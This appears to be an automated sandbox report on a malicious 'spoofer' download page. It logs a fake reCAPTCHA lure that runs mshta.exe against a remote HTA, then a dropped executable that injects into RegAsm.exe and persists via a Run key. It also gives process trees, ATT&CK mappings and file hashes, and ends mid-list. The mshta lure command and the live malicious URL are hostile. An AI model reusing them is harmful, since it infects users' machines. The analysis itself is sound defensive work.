hxxps://heaventools[.]lol/spoofer/download[.]html

Analysis

max time kernel
672s
max time network
647s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21-11-2024 18:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://heaventools.lol/spoofer/download.html

Score

10^/10

defense_evasion discovery persistence phishing

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://heaventools.lol/recaptcha-verify

Signatures

Blocklisted process makes network request 8 IoCs

Processes:

mshta.exe

flow pid process

48 3096 mshta.exe
49 3096 mshta.exe
50 3096 mshta.exe
51 3096 mshta.exe
52 3096 mshta.exe
53 3096 mshta.exe
54 3096 mshta.exe
55 3096 mshta.exe
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
phishing
Executes dropped EXE 3 IoCs

Processes:

recaptcha-verification.exerecaptcha-verification.exerecaptcha-verification.exe

pid process

3456 recaptcha-verification.exe
3308 recaptcha-verification.exe
4584 recaptcha-verification.exe

flow	pid	process
48	3096	mshta.exe
49	3096	mshta.exe
50	3096	mshta.exe
51	3096	mshta.exe
52	3096	mshta.exe
53	3096	mshta.exe
54	3096	mshta.exe
55	3096	mshta.exe

pid	process
3456	recaptcha-verification.exe
3308	recaptcha-verification.exe
4584	recaptcha-verification.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

recaptcha-verification.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender V9 = "C:\\Users\\Admin\\AppData\\Roaming\\windows-defender.exe"	recaptcha-verification.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

recaptcha-verification.exerecaptcha-verification.exerecaptcha-verification.exe

description	pid	process	target process
PID 3456 set thread context of 1588	3456	recaptcha-verification.exe	RegAsm.exe
PID 3308 set thread context of 2232	3308	recaptcha-verification.exe	RegAsm.exe
PID 4584 set thread context of 5096	4584	recaptcha-verification.exe	RegAsm.exe

Drops file in Windows directory 1 IoCs

Processes:

chrome.exe

description ioc process

File opened for modification C:\Windows\SystemTemp chrome.exe
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
defense_evasion

SIP and Trust Provider Hijacking
T1553.003

Processes:

chrome.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\recaptcha-verification.exe:Zone.Identifier chrome.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

description	ioc	process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133766885437575793"	chrome.exe

Modifies registry class 4 IoCs

Processes:

BackgroundTransferHost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

NTFS ADS 2 IoCs

Processes:

chrome.exerecaptcha-verification.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\recaptcha-verification.exe:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Roaming\windows-defender.exe\:Zone.Identifier:$DATA	recaptcha-verification.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

chrome.exechrome.exeRegAsm.exeRegAsm.exeRegAsm.exe

pid	process
3164	chrome.exe
3164	chrome.exe
3688	chrome.exe
3688	chrome.exe
3688	chrome.exe
3688	chrome.exe
1588	RegAsm.exe
1588	RegAsm.exe
2232	RegAsm.exe
2232	RegAsm.exe
5096	RegAsm.exe
5096	RegAsm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

3164 chrome.exe
3164 chrome.exe
3164 chrome.exe
3164 chrome.exe
3164 chrome.exe
3164 chrome.exe
3164 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe
Token: SeShutdownPrivilege	3164	chrome.exe
Token: SeCreatePagefilePrivilege	3164	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

Processes:

chrome.exe

pid	process
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

chrome.exe

pid	process
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe
3164	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3164 wrote to memory of 4588	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4588	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4268	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 2096	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 2096	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe
PID 3164 wrote to memory of 4312	3164	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://heaventools.lol/spoofer/download.html
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe874fcc40,0x7ffe874fcc4c,0x7ffe874fcc58
  2⤵
  PID:4588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1760,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1748 /prefetch:2
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2036,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:8
  2⤵
  PID:4312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:1492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4564,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4392,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4336 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4744,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:3104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4888,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=736 /prefetch:1
  2⤵
  PID:484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4240,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:1
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4848,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2608 /prefetch:1
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4584,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5212,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:2312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5316,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5620 /prefetch:8
  2⤵
  PID:4296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5256,i,12680562109731816225,4449393148452608355,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  PID:1428

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:764

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe"
1⤵
PID:3264

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4620

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://heaventools.lol/recaptcha-verify # ✅ ''I am not a robot - reCAPTCHA Verification ID: 6862''
1⤵
- Blocklisted process makes network request
PID:3096

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5012

C:\Users\Admin\Downloads\recaptcha-verification.exe
"C:\Users\Admin\Downloads\recaptcha-verification.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
PID:3456
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1588

C:\Users\Admin\Downloads\recaptcha-verification.exe
"C:\Users\Admin\Downloads\recaptcha-verification.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3308
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2232

C:\Users\Admin\Downloads\recaptcha-verification.exe
"C:\Users\Admin\Downloads\recaptcha-verification.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4584
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
9650a2fd3437c505c93a5f53437e22e3

SHA1
d65addf0cda0a4f4a12d85567782888a0b8d65d7

SHA256
a7adf894eb5b7ed88d90ad23358df769c89d40a7a7fe536064940d8d68e30ca0

SHA512
f8900f48b929c16295633d53041a0c62a8eac556ce7770ffe255a4be42cfb5a6e833b5df2c132485a36d48b530134c96b7983ed9c140fc06dec2a7730fd0db9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
c95785394275207157253ac5f04a6869

SHA1
3ed6fa448309f128974be60aff6a197250aef297

SHA256
43b2c0a11f40afb5da970ef59c0c9d693e5674a37e2f938ccd8acbcc407d8519

SHA512
1d35932eb061ea5484b83f5e9c2b65057666493e77e4f7cb12f0e5cd69ed29fd37f17012d48cbb4f3ba54be80840bc29905695bdb7873d34366880487c124129

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
09d2f0b521c603288135d24614e3034a

SHA1
96e3782786a9f19d4d51341d15e2ab0e04d8e460

SHA256
c8d8ddf6d1373c995ff14c4e5feee5b63ccc3897b0d056ba78bba72ab7ef861a

SHA512
acbd2648ff42eca1bbf0c12d0b15d5d11818a25b9f50ed366a6d702fee2149516e9bd3ac4faaf0e6676046f59dc1e30824b84f0182fa60a1f6529b4d7632d2e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
e87682d9d18c3d2832c2b694dc837294

SHA1
3a8a105bf156335dea64cb72428873e26ff962a0

SHA256
